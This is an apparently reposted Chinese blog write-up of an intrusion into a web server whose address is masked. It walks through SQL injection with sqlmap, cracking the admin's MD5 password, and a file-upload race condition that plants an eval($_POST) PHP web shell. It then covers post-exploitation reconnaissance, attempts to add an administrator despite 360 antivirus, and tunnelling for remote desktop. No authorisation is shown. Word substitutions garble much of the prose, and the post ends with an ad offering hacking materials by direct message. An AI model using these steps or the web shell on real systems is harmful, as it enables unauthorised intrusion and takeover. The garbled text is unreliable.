php获取cid技巧_记一次简单的渗透测试

image.png

大略测了一下，创造并没有什么过滤，那就常规操作，用SQLmap跑一下

python2 sqlmap.py -u "http://xxx.xx.xx.xx/aaa/bbb.php?cid=118" --tamper=unmagicquotes

接下来便是爆库，爆表，爆列，爆值等常规操作。
获取Admin表中的账号密码，虽说密码是md5加密的了，但是去cmd5平台上一查，还是很方便的进入了后台

image.png

接下来便是寻求Getshell的机会了

image.png

把稳到这里有个上传文件的地方，从源码中可以看到是Fckeditor编辑器从网上搜索干系的漏洞，首先先查看版本

image.png

创造是2.6.6版本的，遗憾的是只能找到2.6.6asp版本的洞，PHP版本的并不能找到干系的漏洞，而用了几个EXP去试试运气也都碰钉子了，渗透本来到此就受阻但是溘然创造还有一个上传学生名单的接口

image.png

测试了一下，只有一个大略的前端认证，并且用burpsuite一看，还有了惊喜的创造

image.png

文件不仅上传成功了，并且还返回了相应的路径，当下便想到来连shell了，但当我想来连之时，却创造文件被删了，由文件路径里面有个temp，一下子就想到后端肯定写了一个自动清空temp目录的函数，但是办理思路也是很明确的，便是条件竞争嘛，通过多线程发包的方法，来实现一定韶光内的文件访问这里我将要发包的文件改为:

<?php file_put_contents('../success.php',"<?php phpinfo();@eval(\$_POST['a']); ?>"); ?>

只要我们能访问到它一次，这个程序就会自动在父目录里面写入一个shell，也就实现了跳出temp目录的写shell了。
用burpsuite的intruder模块不断发包，再访问我们上传的文件，便实现了成功写shell的目的，如图，Getshell:

image.png

image

systeminfo查看系统干系信息

image.png

netstat -ano查看开放的端口

image.png

可以看到3389端口是打开的，也便是可以进行远程连接whoami查看当前用户

image

可以看到是system权限，本来我以为大功告成，接下来便是创建管理员用户，进行远程连接之时，但是创造无论如何都无法把用户添加进管理员组在网上查了很多资料，有人说是可能有杀毒软件。
tasklist一看，果真有360那么问题到这里就只有三条路了:1. 杀掉360，看看能不能利用system的高权限杀掉3602. 得到其他管理员账户的密码或者密码的hash值，利用其他管理员的账户进行登录2. 绕过360创建一个管理员账号

我对这三种情形都进行了考试测验:

将tunnel.nosocket.php上传至web目录(这里不能上传tunnel.php，php<5.3不能正常利用tunnel.php)访问目标文件:

image.png

解释配置正常末了，我们就能成功的利用远程连接了，上了远程连接后，首先退出360所有防护，为接下来的进一步渗透做准备

这次的渗透就先到这里，接下来的域渗透，就等往后有韶光再来学习和研讨了。

这是我第一次进行后Getshell的渗透，写的可能很啰嗦并且很LOW，但是紧张目的还是想让我自己记住这一此渗透学习到的知识，等往后有韶光了再来连续进行下一步的域渗透

渗透测试书本

渗透视频

须要渗透测试资料的关注我 ，私信回答"资料"领取！
！

感谢大家的阅读与关注！
！
！